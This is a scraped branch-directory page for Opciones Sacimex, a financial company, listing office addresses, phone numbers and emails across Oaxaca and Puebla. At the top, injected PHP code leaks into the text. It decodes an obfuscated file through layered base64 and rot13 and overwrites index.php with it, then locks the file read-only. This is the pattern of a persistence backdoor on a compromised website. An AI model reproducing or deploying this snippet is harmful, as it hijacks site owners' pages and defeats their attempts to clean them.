$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Sucursales – Opciones Sacimex

Nuestras sucursales

CORPORATIVO

Dirección
Valerio Trujano 713, Col. Centro, Oaxaca de Juárez, Oax.

Teléfono
(951) 5216005
(951) 5215281

ETLA

Dirección
Zaragoza 8, Col. Centro, Villa de Etla, Oax.

Teléfono
(951) 5216005
(951) 5215281

Correo
etla@opcionessacimex.com

SAN ANTONIO

Dirección
Luis Echeverría Álvarez 100, 3ra Secc Parte Media, San Antonio de la Cal, Oax.

Teléfono
(951) 5685030
(951) 5684799

Correo
sanantonio@opcionessacimex.com

CENTRO

Dirección
Valerio Trujano #713, Col. Centro, Oaxaca de Juárez, Oax.

Teléfono
(951) 5144833
(951) 5010346

Correo
centro@opcionessacimex.com

HUATULCO

Dirección
Av. Benito Juárez Esq. Guerrero, Santa María Huatulco, Oax

Teléfono
(958) 5814274

Correo
huatulco@opcionessacimex.com

CUICATLÁN

Dirección
Calle Morelos #1, 68600 San Juan Bautista Cuicatlán, Oax.

Teléfono
(236) 374 00 82

Correo
cuicatlan@opcionessacimex.com

SALINA CRUZ

Dirección
Calle Acapulco Esq. Héroes de la Marina, Salina Cruz, Oaxaca.

Teléfono
(971) 688 38 68

TECAMACHALCO

Dirección
Calle 4 Sur #501-A, entre 5 y 7 oriente, Tecamachalco, Puebla.

Teléfono
(236) 374 00 82

Correo
tecamachalco@opcionessacimex.com

AJALPAN

Dirección
Rafael Ávila Camacho #3 Oriente esquina Calle 3 Norte, Ajalpan Puebla.

Teléfono
(249) 1030343

Correo
ajalpan@opcionessacimex.com

PROMOTORÍAS

MIAHUATLÁN

Dirección
Calle Zaragoza # 109, Miahuatlán de Porfirio Díaz, Oax.

Teléfono
(951) 6888693

huauchinango

Dirección
Santos Degollado 8A, Centro Huauchinango, Puebla.

Teléfono
(776) 745 65 88

Correo
huauchinango@opcionessacimex.com

Puerto Escondido

Dirección
Calle 3a. Poniente No.501, Sector Juárez, Plaza Arpa, Pto. Escondido, Oax.

Teléfono
(954) 6880694

Huajuapan

Dirección
Hidalgo #33, Col. Centro, Huajuapan de León, Oax.

Teléfono
(953) 6885991

ocotlán

Dirección
Ocotlán de Morelos, Oaxaca.